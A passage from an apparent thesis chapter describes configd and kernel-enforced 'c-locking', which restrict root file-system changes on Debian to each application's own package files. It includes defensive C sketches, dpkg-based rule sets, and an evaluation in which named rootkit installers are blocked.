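            return true;                  /* ordinary DAC checks still apply */
        return t->has_config_permission;  /* c-locked: configd only          */
    }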
In restricting configuration permission to a single daemon, we introduce a chokepoint within which we can further subdivide file-system access by application. We perform the actual subdivision in the above-mentioned configuration daemon, configd. It performs the following operations:
1. Respond to requests for configuration changes from processes running on the system. In our prototype, requests were at the granularity of package operations, but our design could be easily modified to handle other granularities.
2. Designate file-system objects as c-locked. It marks a setting in a data structure associated with the object to denote this designation. In our prototype, every file installed when upgrading or installing a package is marked as c-locked.
3. Perform authorized changes to the configuration of the system.
4 While it is possible to use the kernel as the chokepoint, our preliminary exploration in this direction suggested that implementing the functionality required to further subdivide root on a per-application basis directly in the kernel introduces functionality into the kernel which is already available in user-space.
We now discuss in more detail how the two elements work together to restrict the ability for an application to modify file-system objects belonging to another application.
Linux Kernel Protection of C-Locked File-System Objects
How a kernel handles file-system objects can directly affect the security of c-locking. In the Linux kernel, the key file-system data structures directly related to the protection of file-system objects by configd are the directory entry (or dentry) and the inode. The inode data structure contains most of the information related to the file data and meta data (e.g., the traditional Unix file-system permissions read, write, and execute) and pointers to the actual blocks on disk which hold the file contents. The dentry contains information related to the specific instance of a file in a particular directory, including the name of the file (as it appears in that directory) and a pointer to the inode. For the purposes of c-locking, the dentry inherits the c-locked status of the inode. If the inode is marked as c-locked, then the directory entry can be deleted or moved only by configd. File operations on an inode which is not c-locked are restricted through current access-control restrictions (including traditional Unix file permissions). Figure 6.3 demonstrates the relationship between inodes and dentries.
Symbolic Links. Symbolic links are directory entries in Linux pointing to an inode containing a path string. When opening a symbolic link, the kernel retrieves the path name from the symbolic link inode. It then follows the retrieved path name to obtain another dentry and inode (which is either yet another symbolic link or some other element such as a file or directory). The proposed system supports c-locking the symbolic link, the object it points to, or both.
Hard Links. A hard link is a directory entry in Linux pointing to the same inode as another directory entry. As with regular files, because the inode itself contains the c-lock flag, any hard link pointing to the inode inherits the c-locked attribute associated with the inode. An attacker does not gain modification privilege by creating a hard link to a file-system object protected by c-locking. The ability to create a hard link to a c-locked file is restricted, being either allowed or denied by configd.
Directories. A directory is an inode which, instead of pointing to file data, points to a list of dentries. While previous approaches focused on protecting files more than directories, there are cases in which a directory should be protected. As an example, during start-up the Debian /etc/rcS.d directory is accessed and every file (or file pointed to by a symbolic link) in this directory is run. Any malware installed into this directory would be started automatically during system boot. The proposed system can protect directories since they can be c-locked in the same manner as files and symbolic links.

Figure 6.3. File-system data-structure layout including new c-lock flag.
The prototype configd is designed to subdivide root file-system permissions on a per-application basis. In our framework, configd, or its equivalent, becomes a chokepoint which applications must use in order to modify c-locked file-system objects (and hence the configuration of the system). This is illustrated in Figure 6.4. To enforce that configd is the only way that c-locked file-system objects can be modified, the kernel grants the new configuration permission to configd alone. By delegating this privilege to configd, the kernel need not know about every application on the system or what file belongs to which application; it need only recognize that a specific file is c-locked and leave the handling of this file to configd. The rules enforced by configd, in turn, are designed to be set by a guardian during development of configd.
Figure 6.4. An illustration of configd as a chokepoint. Applications can continue to read and write to user files, but can only read from configuration related files.
configd must be started early during the boot process (configd itself restricts changes to the boot process). Once configd has started, other programs are prevented by the OS kernel from obtaining configuration permission. The design of configd takes advantage of the temporal nature of software installs. At the time of installation of application software, it is assumed that the operating system and configd are already installed and running. This assumption is reasonable if configd is made part of the OS or core system.
Example Configd Rule Set
While the core configd approach can use any number of different protection mechanisms for separating files on a per-application basis, we chose to depend on Debian packages (and indeed, the package manager – dpkg) in our solution. Because we used Debian as the base system in which to implement c-locking, the safe operations performed by the prototype are customized to that environment (e.g., we use the same file extensions as dpkg).
In Debian, the sequence of operations performed by the Debian package manager (dpkg) when installing any new file (during the install or upgrade of a package) is as follows (a sketch of the corresponding file-system calls appears after the list):
1. Create a backup of file-system object A by hard linking A.dpkg-tmp to the same inode as A.
2. Extract the new file which will replace A into A.dpkg-new. If the new file-system object being installed is a hard link, instead create a hard link called A.dpkg-new.
3. Move A.dpkg-new to A.
4. Remove A.dpkg-tmp.
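The four steps map directly onto standard POSIX file-system calls. The sketch below is a simplified rendering of the sequence (error handling is minimal and the extraction of the replacement contents from the package archive is only stubbed out); it is not dpkg's actual code.

    #include <stdio.h>
    #include <unistd.h>

    /* Simplified sketch of dpkg's file-replacement sequence for file A.  */
    static int replace_file(const char *A, const char *A_tmp, const char *A_new)
    {
        /* 1. Back up A by hard linking A.dpkg-tmp to the same inode as A. */
        if (link(A, A_tmp) != 0)
            return -1;

        /* 2. Extract the replacement contents into A.dpkg-new.
         *    (Extraction from the package archive is omitted here.)       */
        FILE *f = fopen(A_new, "w");
        if (f == NULL)
            return -1;
        fclose(f);

        /* 3. Atomically move A.dpkg-new over A.                           */
        if (rename(A_new, A) != 0)
            return -1;

        /* 4. Remove the backup link A.dpkg-tmp.                           */
        return unlink(A_tmp);
    }

    int main(void)
    {
        return replace_file("A", "A.dpkg-tmp", "A.dpkg-new") == 0 ? 0 : 1;
    }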
Under the assumption that the kernel enforces c-locking according to a flag set in the inode, the following operations related to modifying c-locked file-system objects are allowed by the prototype. We have determined that these rules do not allow one application to arbitrarily modify file-system objects associated with another application, and hence they can be considered "safe". (A simplified sketch evaluating two of these rules appears after the list.)
1. If A is a c-locked file-system object that does not end in .dpkg-tmp, then creating a hard link A.dpkg-tmp that points to the same inode as that pointed to by A is allowed.
2. Any c-locked file-system object ending in .dpkg-tmp may be deleted. During prototyping, it was determined that no permanent file-system objects have names that end in .dpkg-tmp and hence this operation does not allow a permanent file associated with an application to be deleted.
3. If A is a c-locked file and A.dpkg-tmp is hard linked to the same inode as B, then creating a file B.dpkg-new that is hard linked to the same inode as A is allowed.
4. If A is a c-locked file-system object whose contents under a cryptographic hash have the same value as A.dpkg-new, then A.dpkg-new can replace A (i.e., if A and A.dpkg-new contain the same data). We do not mandate any specific cryptographic hash algorithm, other than to stipulate that, at minimum, it must have second pre-image resistance (our configd prototype currently supports SHA-1 and can be easily expanded to support others).
5. If A is a c-locked file containing one or more public keys and A.dpkg-new is another file containing a digital signature verified by using a public key in A, then A.dpkg-new is allowed to replace A.
6. If c-locked file A is associated with package PKG and is not associated with any other package installed on the system, then when upgrading package PKG, A may be modified.
7. If c-locked file A is associated with package PKG and is not associated with any other package installed on the system, then install scripts associated with package PKG may modify A.
8. All other operations involving a c-locked file are considered to be potentially dangerous. They can either be presented to an expert user for additional oversight, or simply denied (as discussed in Section ).
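To make the flavour of the rule set concrete, the following C sketch evaluates simplified versions of rules 2 and 4 above (delete a c-locked *.dpkg-tmp entry; let A.dpkg-new replace A only when both contain the same data). The helper names are hypothetical, a direct byte-wise comparison stands in for the cryptographic hash check, and the prototype's real rule engine (which lives in configd and covers all eight rules) looks nothing like this.

    #include <stdbool.h>
    #include <stdio.h>
    #include <string.h>

    /* Stand-in for the hash check of rule 4: the rule allows the
     * replacement only when both files contain the same data, so a
     * direct byte-wise comparison is used here instead of SHA-1.        */
    static bool same_content(const char *path_a, const char *path_b)
    {
        FILE *fa = fopen(path_a, "rb"), *fb = fopen(path_b, "rb");
        bool same = (fa != NULL && fb != NULL);
        int ca = 0, cb = 0;
        while (same && ca != EOF) {
            ca = fgetc(fa);
            cb = fgetc(fb);
            same = (ca == cb);
        }
        if (fa) fclose(fa);
        if (fb) fclose(fb);
        return same;
    }

    static bool ends_with(const char *s, const char *suffix)
    {
        size_t ls = strlen(s), lf = strlen(suffix);
        return ls >= lf && strcmp(s + ls - lf, suffix) == 0;
    }

    /* Rule 2 (simplified): a c-locked object may be deleted only if its
     * name ends in .dpkg-tmp.                                            */
    bool may_delete_clocked(const char *path)
    {
        return ends_with(path, ".dpkg-tmp");
    }

    /* Rule 4 (simplified): A.dpkg-new may replace c-locked A only when
     * the two files contain the same data.                               */
    bool may_replace_clocked(const char *a, const char *a_new)
    {
        return ends_with(a_new, ".dpkg-new") && same_content(a, a_new);
    }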
Of the "safe" rules, some merit further discussion. Rule 3 was created as a result of the way two files that are hard linked together are updated by the Debian package manager. For this rule to apply, A and B would need to have been linked together (and subsequently A.dpkg-tmp created through rule 1). They must have been part of the same package (rule 6), or (if enabled) the user must have allowed A.dpkg-tmp to be hard linked to B (rule 8). Rule 3 limits hard linking to files distributed in the same package.
Rule 5 adapts concepts used by the Android OS, but at the file level (as in Chapter ) as opposed to the package level. The rule relies upon the use of public keys and signatures, but does not rely on a PKI.
Rule 6 allows the modification of all files associated with a package when a new version of the package is installed. The rule requires that configd keep track of packages installed on the system, as well as which files are associated with which packages. We discuss the semantics of how our prototype handled packages in Section . It is important to note, however, that a package cannot modify any file on the system simply by asserting ownership of the file (through including the file in the list of files the package is associated with). Any file that is listed as belonging to more than one package cannot be arbitrarily modified by any package. The option still exists, however, for a file associated with more than one package to be updated through rule .
Rule 7 restricts, through exclusion, the files that an install script can modify. The rule is borrowed from GoboLinux and discussed in more detail in Section .
Our testing confirmed that the above rule set allows upgrade operations performed by dpkg to proceed automatically. While the option of querying the user about remaining operations was left enabled in the prototype, we found in testing that during upgrades the user is not queried at all (see Section ).
While the approach discussed in this chapter must be enforced during every package install, upgrade, and uninstall in order to protect other applications' file-system objects, the approach does not need to be installed on all systems simultaneously in order for benefits to be realized. Systems choosing to implement configd and enforce restrictions on c-locked files will immediately realize the benefits of application encapsulation.
A Prototype Implementation
To support c-locked file-system objects, we used the extended attributes functionality of file-systems such as ext3 and XFS. This is the same approach used by SELinux. In so doing, the underlying file-system-specific data structures do not need to be modified. The extended attributes are tied to the inode. We used the trusted extended attribute name space because it supported setting extended attributes on symbolic links. We created our c-locking protection mechanism as a Linux Security Module. The kernel implementation was approximately 2200 lines of code, including the backward compatibility layer. A new device node was used as the interface between the user-space configd and the modified kernel, allowing communication between the two. The process of opening the device node initiated c-locking protection in the modified kernel. The kernel understands and responds to several commands sent by the user-space configd through the new device node, including:
• release. Because our kernel allows only a single process to obtain configuration privileges at a time, this command was included to allow configd to be stopped, upgraded and started during testing. On a production system, this command can be safely disabled.

• freeze. Freeze all processes on the system except for configd, to prevent race conditions as configd performs file-system changes. It also prevents processes from interfering with the user interface in our prototype (see Section ).

• thaw. Unfreeze all frozen processes on the system, allowing them to continue executing.

• noraw and raw. Disable/enable raw write access on the hard drive device denoted by the associated options major and minor. This was used to prevent applications bypassing configd by writing to the underlying hard drive sectors associated with c-locked file-system objects.
The kernel also sends several commands to the user-space daemon configd, including:

• plugin. A USB token containing a magic value associated with configd has been inserted. The kernel is responsible for disallowing write access to the partition containing the magic value – on machines with configd enabled, only configd is allowed to write to the partition containing the magic value. We discuss the use of USB tokens further in Section .

• remove. A USB token containing a magic value associated with configd has been removed.
To prevent applications from being able to modify c-locked file-system objects through modification of the kernel, the protection mechanism of Chapter was implemented.
Because we implemented the backwards compatibility layer in the kernel (see Section ), the kernel security module was extended to additionally send the pipe command to configd. pipe requests authorization from configd on requests received by the kernel to perform operations on c-locked file-system objects (i.e., the requests were not sent directly to configd by the application). The requests forwarded to configd by the kernel are move, delete, link, and symlink. Configd is responsible for performing permission checks on the request as if it came from some other user-space process. The id number of the request is sent back to the kernel through the use of the new command id. The response to the command is sent back to the kernel through the use of the new commands done, fail, queued and unknown, which are accompanied by an id number previously returned to the kernel by the id command. If the kernel receives a done response, it allows the application to perform the operation; otherwise the operation is denied. Other responses that can be received from configd indicate that the request has been rejected (fail), queued awaiting the user to insert a USB token (queued), or has failed to process due to some other error (unknown).
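The kernel-side handling of configd's reply can be summarized as a small dispatch over the four response commands. The enum and function below are an illustrative sketch only; the prototype's real interface runs over a device node, and these identifiers are not taken from its code.

    /* Illustrative sketch of how the kernel might act on configd's reply
     * to a forwarded (piped) request on a c-locked file-system object.   */
    enum configd_reply { REPLY_DONE, REPLY_FAIL, REPLY_QUEUED, REPLY_UNKNOWN };

    /* Returns 0 to allow the original operation, -1 to deny it.  Only an
     * explicit 'done' reply lets the operation proceed; 'fail' (rejected),
     * 'queued' (awaiting the USB token) and 'unknown' (processing error)
     * all result in denial.                                               */
    int act_on_reply(enum configd_reply reply)
    {
        return (reply == REPLY_DONE) ? 0 : -1;
    }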
The configd prototype is a 12,500-line C++ application. While the primary purpose of writing configd is to encapsulate applications on disk, during the course of development several additional features were added. These include:
1. A mounting module which can decide whether a request to mount a file-system should be performed (it performs the operation, if allowed). To ensure that c-locked file-system objects remain accessible by the applications they are associated with, we must ensure that a new file-system cannot be mounted over top of c-locked file-system objects. Configd does this by examining the trusted.configd.nomount file-system extended attribute. For directories which should not be mounted over (e.g., /usr), this extended attribute should be set on the directory inode (a brief sketch of setting such an attribute appears after this list). The mounting module also informs the kernel through the configd device node that requests to write to the underlying raw hard drive sectors should be denied, since allowing such requests would undermine the security of both c-locking and the per-application restrictions enforced by configd.
2. A modprobe module which handles requests for the insertion or removal of kernel modules. In order to ensure that configd remains the chokepoint for restricting file-system objects on a per-application basis, root must not be allowed to install arbitrary code into the running kernel. While the prototype version of this module currently accepts all requests, kernel module loading can be easily restricted based on a number of criteria, including whether the module is signed with a recognizable key (such an approach would not require a complete PKI infrastructure).
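As an illustration of how such per-object markers can be attached, the sketch below sets the trusted.configd.nomount extended attribute on /usr using the standard Linux xattr system call. This is a minimal sketch of the mechanism, not the prototype's code: the attribute value used here is arbitrary, and writing attributes in the trusted namespace requires elevated privilege (normally CAP_SYS_ADMIN).

    #include <stdio.h>
    #include <string.h>
    #include <sys/xattr.h>

    int main(void)
    {
        /* Mark /usr so that configd will refuse mount requests on top of
         * it.  Attributes in the trusted.* namespace are invisible to,
         * and unmodifiable by, ordinary unprivileged processes.           */
        const char *value = "1";   /* illustrative attribute value         */

        if (setxattr("/usr", "trusted.configd.nomount",
                     value, strlen(value), 0) != 0) {
            perror("setxattr");
            return 1;
        }
        return 0;
    }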
Debian Package Manager Modifications
Because the Debian package manager (dpkg) is responsible for performing most configuration changes on a system, we integrated dpkg with configd. While other methods of restricting configuration changes at a per-application level may choose to totally replace dpkg, augmenting dpkg to communicate with configd was suitable for our prototype (configd had the final say as to whether all requests for operations on c-locked files received from either the kernel or dpkg are allowed). The modified dpkg informed configd about each package which was being installed or upgraded, and also marked as c-locked every file installed when upgrading or installing a package, regardless of whether the file was previously c-locked.
The Debian package manager also keeps track of which files are associated with which packages. While we have not utilized it in our prototype implementation, this tie between files and packages can be used in other protection mechanisms which restrict configuration changes on a per-application level. We discuss several such approaches in Section . Because it is considered an error on Debian to have a file belonging to two unrelated packages, Debian's package approach lends itself nicely to a clean separation between applications.
In our prototype, the Debian package manager and surrounding infrastructure were responsible for preventing one application from assuming the name of another (and hence being able to modify the files associated with the second package). Such an approach depends on the security of the packaging system in Debian, which, although reasonably secure against intrusion, is not perfect. To reduce the dependence on Debian to keep packages from replacing other unrelated packages in the archive, bin-locking (as discussed in Chapter ) can be applied at the package level (as discussed in Sections and ). A package is typically signed with a private key held by the developer. Any new version of that package is allowed to replace the installed one if it is signed with a private key verifiable with the corresponding public key contained in the currently installed package. In this way, application updates are restricted to those software authors holding the private signing key. Unless two applications are written by the same developer, and assuming that private keys are not generally shared between developers, the two applications are unlikely to have any identical keys and hence will not be able to modify each other. In using this approach for Debian packages, we can eliminate the risks associated with relying on the Debian packaging team to properly keep packages distinct.
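The package-level key-continuity check just described can be sketched as follows. Keys are reduced to fingerprint strings and real signature verification is omitted, so this is a hedged illustration of the decision logic only; none of the names are taken from the prototype or from dpkg.

    #include <stdbool.h>
    #include <stddef.h>
    #include <stdio.h>
    #include <string.h>

    /* Key continuity: a new version of a package may replace the installed
     * one only if it was signed with a key already listed in the currently
     * installed version.  Keys appear here only as fingerprint strings.    */
    static bool upgrade_allowed(const char *installed_key_fprs[], size_t nkeys,
                                const char *new_version_signing_key_fpr)
    {
        for (size_t i = 0; i < nkeys; i++)
            if (strcmp(installed_key_fprs[i], new_version_signing_key_fpr) == 0)
                return true;
        return false;
    }

    int main(void)
    {
        const char *keys_in_installed_pkg[] = { "FPR-DEVELOPER-A" };

        /* Signed by the same developer: allowed.  Signed by someone else
         * (e.g., an unrelated or malicious package author): denied.        */
        printf("%d\n", upgrade_allowed(keys_in_installed_pkg, 1, "FPR-DEVELOPER-A"));
        printf("%d\n", upgrade_allowed(keys_in_installed_pkg, 1, "FPR-DEVELOPER-B"));
        return 0;
    }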
Allowing Scripts During Package Install
In Section , rule 7 states that if c-locked file A is associated with package PKG and is not associated with any other package installed on the system, then install scripts associated with package PKG may modify A. In order to enforce that an install script contained in a package may only modify files on the system associated with that package (and no other package), we implemented the ability to run install scripts within configd. The approach closely parallels the approach used by GoboLinux for installing applications (see Section ). The following procedure is used for running install scripts (a simplified sketch in C appears after the list):
1. An unused user ID (UID) is allocated by configd. While configd examined /etc/passwd in our prototype, different methods may be required when using alternate approaches for user account control.
2. For each file associated with package PKG (and not associated with any other package installed on the system), the owner of the file is recorded by configd and then changed to UID.
3. The script is run as user UID by configd. In running the script as a user who only has permission to modify files associated with the package, other applications on the system are protected by the standard access controls on the system.
4. For each file associated with the package PKG, the UID is changed back to the value stored in step 2, unless the user owning the file has been changed by the script.
5. The UID allocated in step 1 is freed.
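A simplified C sketch of this procedure is shown below. The file list, script path, temporary UID, and group ID are placeholders, error handling is reduced to its essentials, and the "unless the script changed the owner" check of step 4 is omitted; it is meant only to show how standard Unix ownership and privilege-dropping primitives enforce the restriction, not to reproduce configd's implementation.

    #include <sys/types.h>
    #include <sys/stat.h>
    #include <sys/wait.h>
    #include <unistd.h>

    int main(void)
    {
        /* Placeholder file list and install script for a package "foo".   */
        const char *pkg_files[] = { "/usr/bin/foo", "/etc/foo.conf" };
        const char *script = "/var/lib/foo/postinst";
        uid_t temp_uid = 61000;            /* an otherwise unused UID       */
        size_t n = sizeof(pkg_files) / sizeof(pkg_files[0]);
        uid_t old_owner[2] = { 0, 0 };
        struct stat st;

        /* Steps 1-2: record each file's owner, then hand the files to the
         * temporary UID so the script can modify only this package's files. */
        for (size_t i = 0; i < n; i++) {
            if (stat(pkg_files[i], &st) == 0) {
                old_owner[i] = st.st_uid;
                chown(pkg_files[i], temp_uid, (gid_t)-1);
            }
        }

        /* Step 3: run the install script under the temporary UID; standard
         * access controls now protect every other application's files.      */
        pid_t pid = fork();
        if (pid == 0) {
            if (setgid(65534) != 0 || setuid(temp_uid) != 0) /* drop privilege */
                _exit(126);
            execl(script, script, (char *)NULL);
            _exit(127);                    /* exec failed                   */
        }
        if (pid > 0)
            waitpid(pid, NULL, 0);

        /* Step 4: restore the recorded owners.                             */
        for (size_t i = 0; i < n; i++)
            chown(pkg_files[i], old_owner[i], (gid_t)-1);

        return 0;
    }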
The approach allows an install script associated with package PKG to modify any file associated with the same package, but does not allow the install script to modify any file associated with any other package installed on the system. It achieves the design goal of restricting file-system modifications such that one application cannot modify the file-system objects associated with another application installed on the system. Indeed, simply implementing the approach into dpkg, without fully implementing configd, has benefits over the current approach of allowing unrestricted access to the file-system by install scripts.
In Linux, ldconfig is responsible for configuring the dynamic linker run-time bindings. During testing of our prototype, scripts occasionally ran ldconfig, which in turn attempted to update /etc/ld.so.cache. This presents a problem, as /etc/ld.so.cache is not associated with the same package as the script, and hence modifications to the file will be denied. To compensate for this, configd runs ldconfig after the script completes, with a UID that only has permission to write to /etc/ld.so.cache. Our prototype currently does not support the updating of symbolic links by ldconfig, relying on the package being installed to install the correct symbolic links. Should this become an issue in the future, configd can be updated to create symbolic links, similar to GoboLinux's SymlinkProgram (see Section ).
The use of fakeroot would provide a more comprehensive approach for allowing installation scripts to execute while not exposing the system to arbitrary file-system modifications. Using fakeroot allows configd to better emulate the permissions currently given to an install script without configd running. In the Linux environment, fakeroot is a program commonly used to make an application believe it has root privileges. The operations performed while running under fakeroot are recorded, and can be processed by configd with the goal of being able to replay the allowed operations later. This approach of recording operations and replaying them later is currently used when creating a distribution package from a source archive. A similar approach has also been used in other secure software installation systems.
Handling of Operations not Automatically Allowed
While the prototype left enabled the option of querying the user for operations not allowed by the other rules discussed in Section , we believe that this rule can be disabled when deploying configd to non-expert user systems, causing configd to reject any file-system operation not allowed by the other rules. During the process of applying security updates to all packages modified between November 12th, 2009 and May 6th, 2010 (a total of ∼100 packages), we were not queried by configd at all about modifications to the file-system.
USB Tokens
The prototype must prevent race conditions, as well as prevent malware from interfering with configd's attempts to query the expert user about changes to c-locked file-system objects. The solution we adopted was to use a USB memory token tied to configd (i.e., it contains a special partition which is recognized by configd). When the user wishes to authorize changes to one or more c-locked file-system objects, a recognized USB token is inserted. The kernel then suspends all processes other than configd to prevent race conditions and tampering with the configd user interface. configd queries the user about any queued c-locked change requests. In relying on the physical insertion of a hardware token as a method to tie the user to a configuration change request, we borrow from the work of Butler et al.
Evaluation of Prototype
In this section, we evaluate the prototype implementation. We discuss its performance, resistance to current malware, and experiences with using the system.
To test the performance of our kernel modifications on file-system intensive day-to-day operations, we performed a complete compile of the Linux 2.6.31.5 kernel. We unpacked, configured (make allmodconfig), compiled, and removed the directory tree containing the compiled kernel. We chose a kernel unzip, compile, and removal because of the number of required disk operations, heavily exercising the file-system as well as our prototype c-locking Linux security module. We ran the test on two different 2.6.28.7 Linux kernels. The first test was with c-locking support not compiled in, and averaged 158 minutes and 52 seconds over three runs. The second timing was performed with c-locking enabled and configd running, and averaged 166 minutes and 34 seconds over three runs. Both tests were run on the same Pentium 4 2.8GHz machine with 1 GB of RAM. Over the three test runs, the average increased run time for the compile with c-locking enforcement enabled was 4.8%. For day-to-day operations which do not involve heavy file-system activity, we expect the overhead of configd to be well under 4.8%. We also expect alternate implementations of configd functionality would produce comparable results.
Verification that Application Encapsulation is Enforced
Malware frequently modifies file-system objects not directly associated with the malware itself (e.g., replacing ls). This provides an appropriate test case for the proposed restriction of configuration changes on a per-application basis during install. Under the new root file-system restrictions, the test is to verify that applications (malicious or other) running with root privileges cannot modify other applications' file-system objects.
To test how well the mechanism presented in this chapter protects a system when exposed to malware, we became root on a system with configd running and kernel protections enabled. We then attempted to run six different Linux rootkit installers. Linux rootkits can be grouped into two categories: those that use some method to gain access to kernel memory, installing themselves in the running kernel and then operating at kernel level, hiding their actions from even root processes; and rootkits that replace core system binaries that are often used by the root user in examining a system. Using the six representative rootkits, we confirmed that the installer failed to gain access to the kernel because of disabled write access to /dev/kmem (which would otherwise undermine configd), and that configd works as expected (i.e., file-system changes possible by malware are restricted to prevent other applications from being modified). That the rootkits failed to gain access to the kernel was verified by examining errors returned by the rootkit installer when attempting the install. The integrity of other applications' file-system objects was verified through comparing cryptographic hashes using Tripwire.
We selected six representative Linux rootkits, two that modify the kernel and four that replace system binaries. Both kernel-based rootkits (suckit2 and mood-nt) failed to install because of disabled write access to /dev/kmem in the prototype's modified kernel. The mood-nt kernel-based rootkit which we tested also attempted to replace /bin/init. The attempt was denied by the prototype because /bin/init is part of a different application on the system.

The four binary replacement rootkits (ARK 1.0.1, cb-r00tkit, dica, and Linux Rootkit 5) all resulted in file-system operations which were denied because they attempted to either replace or delete core system binaries (e.g., ls, netstat, top, and ps). The core system binaries installed belong to applications other than the rootkits and hence changes to them by the rootkit installer were disallowed by our prototype.
Effects of Typical System Use
To test how well configd can be deployed on a pre-existing system, we introduced configd into a Debian desktop installation. We first installed an unmodified Debian Lenny (v5.0) distribution, including the KDE graphical desktop environment, onto a desktop. We then installed the configd daemon and modified kernel, which enforces c-locked file-system restrictions. At this point, any package updates on the system (including installs, re-installs, and upgrades) would result in the associated files being marked c-locked, and hence protected by configd. We then proceeded to re-install all packages that were already present on the system. In performing a re-install, all files associated with a package became marked as c-locked and hence protected by the combination of configd and the modified kernel.
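How the prototype records which package a c-locked file belongs to is an implementation detail; purely as an illustration (the attribute name and the choice of extended attributes are our assumptions, not necessarily those of the prototype), a per-file marker could be written at install time as follows:

    /* mark_clocked.c - hypothetical sketch: record a "c-locked" marker and
     * owning package name as an extended attribute on an installed file.
     * The attribute name and format are invented for illustration; the
     * thesis prototype may record this state differently. */
    #include <stdio.h>
    #include <string.h>
    #include <sys/xattr.h>

    static int mark_clocked(const char *path, const char *package)
    {
        /* "user.clock.package" is a hypothetical attribute name. */
        if (setxattr(path, "user.clock.package", package,
                     strlen(package), 0) != 0) {
            perror("setxattr");
            return -1;
        }
        return 0;
    }

    int main(int argc, char *argv[])
    {
        if (argc != 3) {
            fprintf(stderr, "usage: %s <file> <package>\n", argv[0]);
            return 1;
        }
        return mark_clocked(argv[1], argv[2]) ? 1 : 0;
    }

Whatever the storage mechanism, the kernel protection consults the recorded owner when deciding whether a later write to the file should be permitted.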
Using this base system, where all package files are marked as c-locked,
configd is running, and kernel protections are enabled, we then proceeded to do further testing of the prototype using our desktop install. To test how well the configd prototype accommodates package upgrades, we installed all security updates made available for our desktop install between November 12th, 2009 and May 6th, 2010 (a total of ∼100 packages). During these upgrades, we were not queried by configd at all about modifications to the file-system, we did not see any errors displayed during the upgrade process, and none of the packages appeared to be broken by the upgrades (i.e., the system still ran as expected). To test how well the prototype configd accommodates re-installs, we reinstalled all packages on the desktop system (a total of 897 packages). Again, during the process we were not queried about changes to the system configuration, we did not see any errors displayed during the process, and the system appeared to be fully functional after the reinstall (i.e., we could still log into KDE, browse the web, read e-mail, and watch videos).

Footnote: In our prototype, the denial of the rootkit's attempt to replace /bin/init was performed by the prototype user, but would be performed automatically if the user interface is disabled. The rootkit install was not able to put up a fake configd prompt because of protections discussed in Section .
As a final test, we installed several (new) desktop applications (each consisting of multiple packages), including Inkscape, Pidgin, and Digikam. The new files installed during the application install were marked as c-locked, there were no errors displayed by the package installer, and the applications ran correctly after install. This sequence of tests verified that the prototype system is capable of supporting the install of new packages, as well as the upgrade and re-install of already-installed packages.
Effects on Root of Restricting Configuration Changes
Because root no longer has permission to modify arbitrary files on disk, any configuration changes performed directly by the root user will potentially be disallowed by configd or a related per-application encapsulation mechanism (configuration changes performed during install by the related install script are easily allowed; see Section ). In the prototype system, configuration changes performed by the physical user acting as root ended up being approved, since the person modifying the application configuration and the person approving the change when queried by configd are one and the same. Because any updates to configuration require an individual acting as root to perform them, we believe the extra step of the same individual verifying the change before it is propagated to disk to be minor (e.g., the user updates the configuration file and then authorizes that the update be written to disk when prompted by configd).
Indeed, we can avoid querying the user about configuration changes if the implementation of configd exports a user interface for performing changes (e.g., by providing a text editor). Such an ability does not detract from the security of the system because applications still do not gain the ability to write to file-system objects belonging to other applications.
Benefits over Android or GoboLinux
While the approach draws from both GoboLinux version 014.01 and Android version 2.0, there are several significant improvements over each approach (see Section ). GoboLinux does not cleanly support upgrades, and hence each version of an application will be installed alongside the previous versions.
A limitation of Android is that it does not support install scripts, and it relies on a permission model where each application is assigned its own account.
Configd takes the benefits of both (GoboLinux being able to run install scripts, and Android being able to support upgrades) and combines them, resulting in a system which supports upgrades and works with traditional binary packages and file-system layout.
Related Work
Here we discuss selected related work, beyond that discussed in Section .
Secure Software Installation
Venkatakrishnan et al. proposed RPMShield, a system where actions which will be performed during install of a package are presented to the administrator for verification and then all install actions are logged. RPMShield concentrates on install time, not preventing already-installed applications from modifying the system if they are run as root. While configd focuses on encapsulating an application's file-system objects, RPMShield focuses on allowing the system administrator to examine and approve the actions which will be performed during install.
Kato et al. proposed SoftwarePot, an approach where each application
is encapsulated in its own sandbox, with mediated access to the file-system and network. Shared files are accessed by mapping sandbox-specific file-names to global file-system objects. The mapping between sandbox-specific files and global file-system objects requires additional information not currently distributed with an application package. SoftwarePot encountered a 21% overhead in execution time, while configd encountered a 4.8% overhead.
Sun et al. proposed grouping applications into two categories, those
which are trusted, and those which are not. All untrusted applications are installed inside a common sandbox, while trusted applications are not. The approach relies on the ability to always properly identify and classify malicious applications as untrusted. It does not prevent trusted applications from modifying file-system objects related to other trusted applications (and indeed, untrusted applications can modify file-system objects related to other untrusted applications). Configd, in contrast, does not distinguish between trusted and untrusted applications, treating all applications equally and restricting the modifications which can be performed on file-system objects.
Smart Phones
Those developing smart phones learnt from the instability and malware problems in the desktop space. Instead of segregating users (since each device is assumed to be used by a single user), they took the direction of segregating applications. Smart phone architectures also disabled the granting of root permission to applications on the system. Smart phone vendors have long retained strong control of their devices, having important reasons for limiting the damage an application could do to (or with) the device (e.g., due to strict broadcasting regulations).
On the iPhone platform, each application must be signed by Apple before
being loaded onto the device. This approach assumes Apple will be able to properly vet all applications before allowing them to be loaded onto the device, an assumption which has proven risky (indeed, Apple now has a mechanism for disabling malicious applications which happen to slip through). The approach also has scalability drawbacks.
The encapsulation approach taken by the Android smart phone is discussed in Section .
Rootkit-Resistant Disks
Butler et al. proposed a method where regions of disk were marked as requiring a specific USB key to be inserted before they could be updated. The approach works at the block level, underneath the file-system. Blocks on disk become marked as associated with a USB key when they are updated while the key is installed. In their approach, the user is involved in differentiating between when a system should be used to perform day-to-day operations and when the system is being configured. This separation, however, does not carry over into isolating day-to-day and configuration operations. Because the protection mechanism is implemented underneath the operating system at the block level, applications used for performing day-to-day operations continue to run (and even inherit configuration permission) when the user inserts a USB key indicating they want to change the configuration of the system. The Butler et al. approach of attempting to restrict configuration operations closely parallels the first step in our approach to limiting the potential for abuse of root file-system privilege – the separation of configuration from normal day-to-day activities performed on a system.
The approach taken by Butler et al. attempts to further minimize the po-
tential for abuse through the use of multiple USB keys, but does not reach an application-level granularity. Indeed, they suggest using different tokens for different roles (e.g., one token associated with all binaries and another associated with all configuration files).
Other Related Work
The splitting of root privilege is a common technique for limiting abuse in areas other than file-system control. Techniques such as capabilities and fine-grained access control also split up root, but focus mainly on installed applications, not the installers themselves.
In the past few years, virtual machines (VMs) have started to become much
more popular in server environments, to allow a single machine to run multiple instances of an operating system. As part of the popularization of virtual environments, the opportunity to introduce additional segregation between applications has arisen. Each VM instance runs its own instance of an operating system and is assigned its own file-system and display. A typical setup involving virtual machines still groups many related applications together in a single VM.
